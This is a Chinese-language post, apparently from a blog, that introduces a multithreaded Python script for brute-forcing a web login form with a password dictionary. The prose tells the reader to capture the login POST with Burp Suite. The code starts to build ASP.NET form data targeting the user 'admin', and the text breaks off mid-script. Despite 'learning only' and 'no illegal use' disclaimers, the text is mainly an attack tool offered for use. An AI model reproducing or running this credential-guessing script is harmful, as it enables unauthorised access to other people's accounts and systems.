首先,你得有一个好的密码字典。
程序仅用于学习和交流,如果有更好的功能或不足请告知我!
运行程序前需要burpsuite 或者其他代理拦截,得到post以及爆破实际网址才能继续进行。
#!/usr/bin/env python
# coding=utf-8
'''
请勿用于非法用途!
命令行运行,加上的参数为密码字典,字典请自行网上查找
使用前请自行更改POST数据
脚本已测试通过 支持python3
By LiT0
'''
import requests
import sys
from concurrent.futures import ThreadPoolExecutor
import os
def DelDict(Dict):
#处理字典转化为Post数据,!注意!!请根据post返回的数据自行定义!以下仅为其中一例
PostDict = {
'__VIEWSTATE':'%2FwEPDwULLTEzMzEwNTMxMDNkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQZpbG9naW4FBmlyZXNldA%3D%3D',
'txtUserId':'admin',